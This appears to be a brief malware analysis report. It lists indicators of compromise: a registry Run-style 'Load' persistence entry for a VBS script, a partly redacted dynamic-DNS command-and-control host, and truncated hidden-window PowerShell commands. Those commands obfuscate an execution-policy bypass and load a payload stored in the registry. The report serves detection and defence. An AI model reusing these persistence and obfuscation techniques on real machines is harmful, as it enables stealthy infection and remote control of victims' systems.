Technical information
- [<HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\] 'Load' = '%USERPROFILE%\AppData\Roaming\GFGHGGH.VBS'
- 'vi#####dows.hopto.org':31028
- DNS ASK vi#####dows.hopto.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy chr(66)&chr(121)&chr(112)&chr(97)&chr(115)&chr(115) -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Key__Name').Key__Name...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy chr(66)&chr(121)&chr(112)&chr(97)&chr(115)&chr(115) -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'Key__Name').Key__Name...